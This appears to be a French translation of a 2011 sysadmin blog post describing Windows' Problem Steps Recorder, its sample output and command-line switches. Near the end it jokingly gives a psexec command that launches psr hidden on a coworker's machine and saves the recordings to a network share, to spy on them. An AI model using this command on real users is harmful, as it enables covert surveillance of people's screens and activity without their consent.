Espionner un PC avec PSR

Connaissez-vous PSR?

PSR est un outil disponible depuis Windows 7, permettant de faire des captures vidéo

Vous avez déjà eu besoin que quelqu’un vous dise exactement ce qu’il a fait pour reproduire un bogue ? Oui, je sais, ceux qui ont besoin d’un outil pour nous dire ces choses sont les plus susceptibles de ne jamais en utiliser un. Mais si vous avez besoin d’envoyer des instructions pas à pas (ou d’en recevoir, n’est-ce pas…) et que vous avez Windows 7, vous disposez déjà d’un outil très pratique pour cela, appelé Problem Steps Recorder. Tapez « psr » dans le menu Démarrer et c’est parti. Il prend des captures d’écran, enregistre vos activités et formate le tout dans un fichier mht réservé à IE.  Voici le résultat après avoir cliqué sur une fenêtre Zune.  Oui, j’ai dit Zune ; il était en vente il y a 6 ans et il fonctionne toujours comme un champion. Moche mais solide comme s’il avait été conçu par des ingénieurs soviétiques de dimension parallèle.

psr

et voici la sortie texte :

Recording Session: 12/2/2011 7:13:47 PM - 7:14:05 PM
Problem Steps: 11, Missed Steps: 0, Other Errors: 0
Operating System: 7601.17640.x86fre.win7sp1_gdr.110622-1506 6.1.1.0.2.1
Problem Step 1: User left click in "Zune"
Program: Microsoft Zune, 4.8.2345.0 (ZUNE_DORADO_V4.8_RTM.110805-1156),  Microsoft Corporation, ZUNE.EXE, ZUNE.EXE
UI Elements: Zune, UIX Render Window

Les commutateurs de ligne de commande psr sont également amusants :

/start            :Start Recording. (Outputpath flag SHOULD be specified)
/stop            :Stop Recording.
/sc            :Capture screenshots for recorded steps.
/maxsc            :Maximum number of recent screen captures.
/maxlogsize        :Maximum log file size (in MB) before wrapping occurs.
/gui            : Display control GUI.
/arcetl            :Include raw ETW file in archive output.
/arcxml            :Include MHT file in archive output.
/recordpid        :Record all actions associated with given PID.
/sketch            :Sketch UI if no screenshot was saved.
/slides            :Create slide show HTML pages.
/output            :Store output of record session in given path.
/stopevent        :Event to signal after output files are generated.

Qu’est-ce que c’est ? Vous pouvez désactiver l’interface graphique et copier la sortie dans un dossier réseau ? Hmm, je parie que vous pouvez utiliser un peu de magie psexec et le démarrer à distance sur les machines des utilisateurs que vous voulez surveiller. On dirait que nous avons là un bon petit outil d’espionnage !

psexec \evilcoworker C:WindowsSystem32psr.exe  /start /gui 0 /output \serversharefile.zip

Ah, maintenant on parle ma langue ! Après une heure ou deux, envoyez un /stop et profitez de votre petit espionnage mesquin, bande de cinglés misanthropes.

Oh Microsoft, même quand vous faites un outil décent, il devient trivialement facile à utiliser à des fins maléfiques. C’est pourquoi je t’aime toujours, MS. Vous ne pouvez pas vous débarrasser du mal, même si vous essayez très fort.

Source: https://annoyedadmin.wordpress.com/2011/12/02/windows-7-psr/